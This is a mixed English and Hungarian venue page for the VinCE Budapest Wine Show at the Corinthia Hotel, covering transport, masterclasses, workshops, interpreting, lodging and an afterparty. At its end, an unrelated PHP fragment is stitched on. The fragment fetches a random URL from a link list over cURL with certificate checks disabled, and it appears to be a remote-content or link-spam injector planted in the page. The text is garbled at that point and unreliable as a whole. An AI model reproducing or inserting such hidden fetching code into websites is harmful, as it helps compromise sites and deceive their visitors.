Venue


A glamorous venue
The venue of VinCe Budapest Wine Show is – as it has been since the beginning – the stunning Corinthia Hotel Budapest. The greatest indoor exhibition area of Budapest is fully used by our exhibitors – we guarantee that you will spend even 3 days easily here.
forgóajtó

In the heart of the city
Corinthia Hotel Budapest is situated in the very centre of the city, a short walk from Nyugati railway station and Oktogon square (VII. district, Erzsébet boulvard 43–47.)
You can travel to the venue
– by tram: No 4 or No 6 trams, and stop at Király street, fro the stop you will see the facade of the hotel
– by underground: Line no 2, station Blaha Lujza square and 10 minutes walk or Line No 1, station Oktogon and 5 minutes walk
Map

Masterclass – 200 people are seated in the fascinating ballroom
A VinCE legnagyobb érdeklődésre számot tartó ültetett kóstolói, a mesterkurzusok a Corinthia Hotel Budapest báltermében kapnak helyet. Egyszerre 200 fő tud leülni, mindenki az asztalon 6-8, esetleg 10, sőt arra is volt már példa, hogy 12 pohár sorakozott. Ásványvizet, tollat, kóstolólapot, borsort természetesen biztosítunk. A mesterkurzusokat január 15-én tesszük közzé. A mesterkurzusok ára 2–5000 Ft /fő, de elengedhetetlen hozzá a választott mesterkurzus napjára szóló napijegy.
mesterkurzus

Workshop – interaktív kóstolók, ahol mindenki véleménye fontos
A lépcsőn felérve jobbra kell fordulni, át az I. csarnokon, majd keresztül a hídon és a II. csarnok baloldali részén találjuk a workshoptermet, ahol 100 fős, közvetlenebb hangulatú ültetett kóstolók zajlanak. Ásványvizet, tollat, kóstolólapot, borsort természetesen itt is biztosítunk. A workshopokat január 15-én tesszük közzé. A workshopok ára 2–5000 Ft /fő, de elengedhetetlen hozzá a választott workshop napjára szóló napijegy.

workshop

Angolul vagy magyarra fordítva – tolmácsot biztosítunk!
Mesterkurzusainkon és workshopjainkon az előadók többnyire angolul tartják előadásaikat. A kivetítőn látható prezentációk segítik a megértést, de mindkét teremben szinkrontolmácsot is biztosítunk, tehát a fejhallgatókon magyarul is követhetjük az előadót. Ha az előadó más nyelven ad elő (például olaszul, franciául, portugálul), tolmácsot ekkor is biztosítunk. Az előadás nyelvét mindig jelöljük.
tolmács

VinCE Bár – a tanulás leglazább módja
A VinCE Budapest egyik legnépszerűbb programja rendszerint a VinCE Bár, itt ugyanis egészen kötetlenül, bárszékeken ülve, könyöklők köré telepedve hallgathatunk röpke (40-45 perces), prezentációkat, persze általában kóstolhatunk is mellé. Itt az előadások magyar nyelven hangzanak el, ha mégis külföldi az előadó, akkor követő tolmácsot biztosítunk.Ha az előadó más nyelven ad elő (például olaszul, franciául, portugálul), tolmácsot ekkor is biztosítunk. Az előadás nyelvét mindig jelöljük.

VinCE Bár

Szállás a legjobb helyen
A legideálisabb szállás a VinCE Budapest Wine Show vendégeinek természetesen magában a házban van, hiszen este nem kell messzire menni, reggel sem kell messzire menni, a reggeli pazar, a spa fejedelmi. A VinCE Budapest vendégei speciális kedvezményt kapnak a hoteltől, ennek részleteit hamarosan közreadjuk.

Corinthia-spa

Food court – étkezés lehetőség a VinCE Budapest Wine Show-n belül
A VinCE vendégei karszalagjukkal elhagyhatját a rendezvényt és vissza is térhetnek, ha másutt szeretnének ebédelni, de maga a VinCE is számos étkezési lehetőséget biztosít. Gourmet-kiállítóink minőségi, ízletes finomságokat kínálnak, és természetesen desszertet és kávét is találnak vendégeink kiállítóink portékái között.
sonkamester
chez dodoAfterparty
A kóstolás 20 órakor véget ér, aki azonban a sok kóstolt bor élményével végre önfeledten fogyasztani is szeretne, annak javasoljuk a VinCE Afterparty-t, amelyre valmelyik, a Corinthia Hotel Budapest épületétől pár lépésre található budapesti szórakozóhelyen kerül sor. Ha szeretne együtt lazulni a borászokkal, akik legalább olyan merészek a táncparketten, mint a hordók között, akkor ott a helye! Részletek február elején várhatók!

Amennyiben nem szeretne lemaradni a legizgalmasabb boros programokról és a VinCE Budapest legrissebb híreiről, iratkozzon fel hírlevelünkre! Hetente jelentkezük borajánlattal, programtippekkel és a VinCE Budapest legizgalmasabb híreivel. Feliratkozás itt.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>